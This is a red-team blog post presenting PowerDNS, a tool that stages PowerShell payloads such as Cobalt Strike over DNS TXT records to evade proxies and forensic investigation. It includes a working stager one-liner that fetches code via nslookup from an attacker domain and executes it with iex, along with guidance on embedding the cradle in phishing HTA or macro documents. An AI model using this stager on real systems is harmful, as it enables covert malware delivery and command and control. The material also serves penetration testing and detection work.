PowerShell DNS Delivery with PowerDNS

Delivery of staged and stageless payloads is often achieved using the PowerShell web delivery technique. While this is a highly effective strategy for staging, in some cases it can be prone to failure, such as proxies blocking due to categorisation, incompatible malleable profiles or your payload simply reaching a non-domain joined user or user without proxy credentials. DNS however is often a reliable means of egress and does not suffer from such pitfalls.

With this in mind, we developed PowerDNS, a simple proof of concept for delivering PowerShell payloads using DNS as an egress channel. The primary use case for PowerDNS is the execution of stageless DNS payloads, which would ultimately allow you to perform DNS only delivery and C2. While this could be achieved using CACTUSTORCH to embed a stageless DNS payload, PowerDNS has additional operational security advantages such as not touching disk and separating the implant from the phishing payloads thus making it more complex for the blue team to reconstruct or investigate an attack.

Understanding PowerDNS

In order to use PowerDNS, you require an authoritative nameserver for a domain under your control. PowerDNS leverages scapy to listen for DNS TXT requests for the given domain. On launch, the PowerShell script that you want to execute is first read, base64 encoded and split in to chunks. Each DNS request made by the client corresponds to an entry within the chunk list. For example, would retrieve element 1 in the chunk list. The first element in the list is the DNS stager code, this is essentially a PowerShell loop that will iterate over the following chunks, unencode and execute the PowerShell script. The DNS stager code will look as follows:

[code]for ($i=1;$i -le %s;$i++){$b64+=iex(nslookup -q=txt -timeout=3 $i’’)[-1]};iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64))))[/code]

PowerDNS attempts to maintain compatibility with older versions of PowerShell by using nslookup to retrieve the TXT record, as opposed to the PowerShell DNS cmdlets which are only available in PowerShell version 3.0 or later.

When PowerDNS launches, it will provide the user with a DNS download cradle that can be run on target host, or embedded in a phishing payload such as a HTA or macro enabled document. An example is shown below which demonstrates PowerDNS hosting a Cobalt Strike PowerShell payload, then serving it over DNS to the Windows client that has executed a malicious HTA file.

Presently, PowerDNS does not attempt to obfuscate or obscure the PowerShell commands that are executed. This could however be performed using @danielbohannon’s Invoke-CradleCrafter.

A video of PowerDNS in action is shown below:

PowerDNS can be downloaded from the MDSec ActiveBreach Github page.

PowerDNS was developed by @domchell of the MDSec ActiveBreach team.

written by

Dominic Chell

Ready to engage
with MDSec?

Copyright 2020 MDSec